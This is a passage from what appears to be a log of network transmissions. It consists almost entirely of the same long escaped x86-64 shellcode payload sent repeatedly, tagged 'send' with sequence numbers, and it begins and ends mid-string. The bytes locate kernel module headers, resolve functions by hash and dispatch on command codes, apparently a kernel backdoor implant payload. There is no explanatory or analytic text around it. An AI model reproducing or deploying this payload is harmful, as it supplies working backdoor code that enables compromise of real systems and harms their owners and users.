xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 7, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 9, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3S